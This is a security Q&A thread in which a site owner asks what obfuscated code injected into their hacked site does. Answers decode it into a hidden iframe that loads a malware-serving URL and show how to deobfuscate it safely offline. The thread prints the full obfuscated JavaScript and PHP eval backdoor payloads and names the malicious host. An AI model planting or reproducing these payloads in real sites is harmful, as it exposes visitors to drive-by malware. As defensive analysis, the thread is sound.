What does this injected code do?

Question

One of my sites has just been hacked as this code has been inserted into random(?) files and places within the files.

Does anyone understand what it is trying to do? I would welcome anything that may assist me with finding out how it got on.

Also, any suggestions on how to stop it re-appearing? Every time I delete it, it just comes back a short while later.

<!--0242d5--><script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!70!7a!74!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!70!7a!74!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!77!77!2e!62!65!74!74!65!72!62!61!6@!6c!62!6f!6e!64!73!2e!6e!65!74!2f!56!4c!4e!53!65!63!30!31!2f!63!6e!74!2e!70!68!70!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!70!7a!74!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!70!7a!74!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!70!7a!74!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!70!7a!74!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=62;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-485!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}</script><!--/0242d5-->
----


CODE in various places and end of files
----

<?
#0242d5#
                                                                                                                                                                                                                                                          eval(gzinflate(base64_decode("5VbBcpswEL33KywOHRinNiCQnBJSz+TUc46lBwwC03EMRcRp7PG/d3eFk+Bx2k6SnuLRjKWn3bdvV1rZKlvWI2v0bj8XOmurpht1942KE6tTv7rpj3STGjixRqt0Xd6mJW4O8Mv3W7MmbtJWq6/rLtI6tj2fO1+uu7Zal5OirW+ulml7VefqsxuluvwJhfNnTAgmQyYUE5zJgIk5EwUufZfBrj/HiVywnKUEHYYUTHhM+jgHHwlEPjlLRHhOeEBcnALkTFAYiOGbYD4hHkUNWQDzjJCnlqBAEq0ge6/fBRCUcSPrWNqxHGAy0fijNGSdYQQcAAJDgUPKfqBGEmhscOIT4hFtRnMqFGQJ/GivenvgCQULMhYoFnLKhjMOUTzcgvlDGSA0yiA9fPGPmUC8eV+rnqJAHI2H5/eYqockaFOgowz7lF4e1WSPJTnU5mk8/pqEoCBYMTIwZzSg9jBjOXtNxcyNMuc6e2v2/hKL/yGc+km6f+M9wQ16+ob2/tiWsr/CJ7sx8FFOQLV76MyBamrLZ9+MgabnRWAD+ofrHPaReEYuc3x4+pQCLEKYndBhQK7QCzvu4AjI4OV4gbi3qZCid8+l5g37RyTgdPXNeZP7se9J3TInCL6QeGasEmvSqmaVZsqezqflWWKdJ5Yz0c2q6uzEYrCIuvZ+l9fZ7Y1ad5NFnd9/jN2Jt8/SLlvaZa5LnZfObruNeZQv9LJVseeLqCpss3J2m2Jzp2J3QBT1/ikSHEy8aA9ujBbOTsVqk66ivYbfn8RCwu3WKerWroCr+hS65wwn47Gzg727ap3Xd5MDv6PHsdZ2Y+MP2Lfq+5knHIfojw2VrWFjfzE1fwwuP1jRbw==")));

#/0242d5#

?>

--

(within above tags [#0242d5# and #/0242d5#] is this code -that wont show properly with just pasting here)

eval(gzinflate(base64_decode("5VbBcpswEL33KywOHRinNiCQnBJSz+TUc46lBwwC03EMRcRp7PG/d3eFk+Bx2k6SnuLRjKWn3bdvV1rZKlvWI2v0bj8XOmurpht1942KE6tTv7rpj3STGjixRqt0Xd6mJW4O8Mv3W7MmbtJWq6/rLtI6tj2fO1+uu7Zal5OirW+ulml7VefqsxuluvwJhfNnTAgmQyYUE5zJgIk5EwUufZfBrj/HiVywnKUEHYYUTHhM+jgHHwlEPjlLRHhOeEBcnALkTFAYiOGbYD4hHkUNWQDzjJCnlqBAEq0ge6/fBRCUcSPrWNqxHGAy0fijNGSdYQQcAAJDgUPKfqBGEmhscOIT4hFtRnMqFGQJ/GivenvgCQULMhYoFnLKhjMOUTzcgvlDGSA0yiA9fPGPmUC8eV+rnqJAHI2H5/eYqockaFOgowz7lF4e1WSPJTnU5mk8/pqEoCBYMTIwZzSg9jBjOXtNxcyNMuc6e2v2/hKL/yGc+km6f+M9wQ16+ob2/tiWsr/CJ7sx8FFOQLV76MyBamrLZ9+MgabnRWAD+ofrHPaReEYuc3x4+pQCLEKYndBhQK7QCzvu4AjI4OV4gbi3qZCid8+l5g37RyTgdPXNeZP7se9J3TInCL6QeGasEmvSqmaVZsqezqflWWKdJ5Yz0c2q6uzEYrCIuvZ+l9fZ7Y1ad5NFnd9/jN2Jt8/SLlvaZa5LnZfObruNeZQv9LJVseeLqCpss3J2m2Jzp2J3QBT1/ikSHEy8aA9ujBbOTsVqk66ivYbfn8RCwu3WKerWroCr+hS65wwn47Gzg727ap3Xd5MDv6PHsdZ2Y+MP2Lfq+5knHIfojw2VrWFjfzE1fwwuP1jRbw==")));

Can you copy or link us to a pastebin version of the entire source code? — NULLZ, Apr 03 '13 at 06:48

score 23 · Accepted Answer · edited May 23 '17 at 12:40

The first (in bold) code is actually this: Decoded with deobfuscatejavascript.com

(function() {
    var pzt = document.createElement('iframe');

    pzt.src = 'http://www.betterbailbonds.net/VLNSec01/cnt.php';
    pzt.style.position = 'absolute';
    pzt.style.border = '0';
    pzt.style.height = '1px';
    pzt.style.width = '1px';
    pzt.style.left = '1px';
    pzt.style.top = '1px';

    if (!document.getElementById('pzt')) {
        document.write('<div id=\'pzt\'></div>');
        document.getElementById('pzt').appendChild(pzt);
    } })();

Yes. This stuff does look malicious. It appears to be including files from another (probably also hacked) server in order to do -something-. The reason the code looks like this is because someone has attempted to obfuscate the code using some tools. Luckily its reversible.

The code above is basically creating an 'invisible' iframe in the page and loading the URL from betterbailbonds.net.

Kaspersky Internet Security Flags it as a malware serving site.

The second chunk of code is base64 encoded and gzinflated decoded with: This tool

echo "

p=parseInt;ss=(123)?String.fromCharCode:0;asgq=\"28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!6@!78!62!6@!67!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!77!77!2e!62!65!74!74!65!72!62!61!6@!6c!62!6f!6e!64!73!2e!6e!65!74!2f!56!4c!4e!53!65!63!30!31!2f!63!6e!74!2e!70!68!70!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!6@!78!62!6@!67!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!6@!78!62!6@!67!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!6@!78!62!6@!67!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!6@!78!62!6@!67!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b\".replace(/@/g,\"9\").split(\"!\");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=126;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s=\"\";if(zz)for(i=0;i-509!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}";

The above code then deobfuscates (had to do it manually this time because the online one threw errors??) again into something similar but with different variable names:

( function () { var ixbig = document.createElement('iframe');

ixbig.src = 'http://www.betterbailbonds.net/VLNSec01/cnt.php';
ixbig.style.position = 'absolute';
ixbig.style.border = '0';
ixbig.style.height = '1px';
ixbig.style.width = '1px';
ixbig.style.left = '1px';
ixbig.style.top = '1px';

if (!document.getElementById('ixbig')) {
    document.write('<div id=\'ixbig\'></div>');
    document.getElementById('ixbig').appendChild(ixbig);
} })();

A quick google search shows that it appears you've been part of a wider attack with many people having similar code embedded in their pages. This also appears to be a duplicate of this stackexchage post

Edit:

I've just noticed that accessing this page flags it as malware via kaspersky internet security. It's obviously aware of the script and define it as HEUR:Trojan.Script.Generic

Hi @adnan Thanks for prompt response and explanation -any idea what vulnerability let it in? - google reckon its a trojan and I thought as it was js i may be xss? However the theory is ok but actually finding the weakness in older code is not too obvious!! Sorry but did try google first but did not find the anwers you did - probably looking for wrong keywords! — Keith B, Apr 03 '13 at 08:06
@KeithB we can't tell you that from looking at the injected code. You'd need to perform a review of your environment. I recall hearing something earlier today about a recent spate of Apache attacks however so that might be worth checking. — NULLZ, Apr 03 '13 at 08:18

F. Hauri - Give Up GitHub · Answer 2 · 2013-04-05T14:39:40.837

Locally done

This could by done easily with standard stuff:

One of the advantages is that could be done offline, as @D3C4FF commented.

.0 Preamble

warning: execution of bad code may be harmfull, so using a special user account with no right on your host and personal stuff is strongly recommanded!

There is a kind of temporary trick, I use:

#!/bin/bash
adduser --disabled-password se-33671 </dev/null
su - se-33671 -c 'bash -i'
ps --user se-33671 feww && \
    echo WARNING: Something remain || \
    deluser --remove-home se-33671 </dev/null

.1 First step

Simply changing eval for print and enclosing in php tags:

echo '<?php print(gzinflate(base64_decode("5VbBcpsw...jRbw==")));?>' |
    php > suspect.html

Then now we could see the javascipt in suspect.html

This step is normaly done by server, sending html result to client.

.2 Second step

For this, I use spidermonkey command line javascript interpreter.

There is no window object, so the code have to be modified:

Replacing all eval by print for printing instead of executing,

all window.document by 1 to satisfy conditions,

and cleaning tag and escapes:

sed -ne 's/<[^>]*>//g;
    s/^echo." *//;
    s/\\"/"/g;
    s/eval/print/;
    s/)e(/)print(/;
    s/window.document/1/g;
    /parse/p' suspect.html |
  smjs

This will dump the polluating inclusion to the console:

(function () {
    var ixbig = document.createElement('iframe');

    ixbig.src = 'http://www.betterbailbonds.net/VLNSec01/cnt.php';
    ixbig.style.position = 'absolute';
    ixbig.style.border = '0';
    ixbig.style.height = '1px';
    ixbig.style.width = '1px';
    ixbig.style.left = '1px';
    ixbig.style.top = '1px';

    if (!document.getElementById('ixbig')) {
        document.write('<div id=\'ixbig\'></div>');
        document.getElementById('ixbig').appendChild(ixbig);
    }
})();

This work fine for the current sample, but have to be adapted for each case.

Generally, the simpliest way to whipe obfuscation out is to partialy execute the stuff, but care!

Thanks for the explaination - I have found one of my hosters uses suphp so I am removing write access from most files ie 644 to 444 and .php to 400 as I have seen this recommended. Is this usually done on web servers and will it deter many/any of these code injection attacks?? — Keith B, Apr 04 '13 at 13:54
Hum warn, this is another question! The answer could not by simply `yes, but...` — F. Hauri - Give Up GitHub, Apr 04 '13 at 22:12
I think it'd be better to do offline static analysis of the files. Download them to your desktop and decode as per above rather than to execute the code and risk your controls being compromised. — NULLZ, Apr 05 '13 at 06:52
@D3C4FF Yes, of course as there is no external requirement, all this would be better done offline. (In fact the host I use to do this is not configured with a default route) — F. Hauri - Give Up GitHub, Apr 05 '13 at 14:01

What does this injected code do?

2 Answers2

Locally done